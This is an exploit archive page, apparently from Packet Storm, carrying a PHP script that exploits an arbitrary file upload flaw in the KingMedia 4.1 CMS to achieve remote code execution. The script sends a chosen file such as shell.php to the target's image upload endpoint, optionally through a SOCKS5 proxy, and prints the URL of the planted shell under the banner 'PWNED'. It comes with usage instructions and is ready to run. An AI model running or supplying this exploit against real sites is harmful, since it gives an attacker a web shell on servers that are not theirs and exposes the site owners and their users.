exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

KingMedia 4.1 Remote Code Execution

KingMedia 4.1 Remote Code Execution
Posted Aug 22, 2018
Authored by Efren Diaz

KingMedia version 4.1 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
SHA-256 | ea08bc9f952e68c6aefc82b54529c5f897c609f9f2c77e9ae499a8173c08d7fc

KingMedia 4.1 Remote Code Execution

Change Mirror Download
# Exploit Title: KingMedia 4.1 - Remote Code Execution
# Author: Efren Diaz
# Exploit Date: 2018-08-15
# Software: KingMedia
# Version: 1.x, 2.x, 3.x, 4.1
# Link: https://codecanyon.net/item/king-media-video-image-upload-and-share/7877877
# CVE: N/A

<?php
// Author: Efren Diaz (elefr3n)
// https://twitter.com/elefr3n

echo "--------------------------------------------\n";
echo "KING MEDIA CMS ARBITRARY FILE UPLOAD EXPLOIT\n";
echo "--------------------------------------------\n";

if (!isset($argv[2]))
{
echo "\nUsage: exploit.php <target> <file> <socks5>\n\n";
echo " -target: http://site.com/... (required)\n";
echo " -file: shell.php (required)\n";
echo " -socks5: 127.0.0.1:1337 (optional)\n\n";
} else {
echo "\nUploading file...\n\n";

$file = $argv[2];
$target = $argv[1];

$mimeType = image_type_to_mime_type(exif_imagetype($file));
$cFile = curl_file_create($file, $mimeType, $file);

$post = array(
'ImageFile'=> $cFile
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_HTTPHEADER, array("X-Requested-With: XMLHttpRequest"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

if (isset($argv[3])) {
curl_setopt($ch, CURLOPT_PROXY, isset($argv[3]));
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
}
$result=curl_exec($ch);

preg_match_all('/src="(.*)" alt="Resized/i',$result,$uploaded_shell);

if (isset($uploaded_shell[1][0])) {
echo "PWNED ! :D \n\n{$uploaded_shell[1][0]}\n\n";
} else {
echo "Something was bad... str result:\n{$result}";
}
curl_close ($ch);
}

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close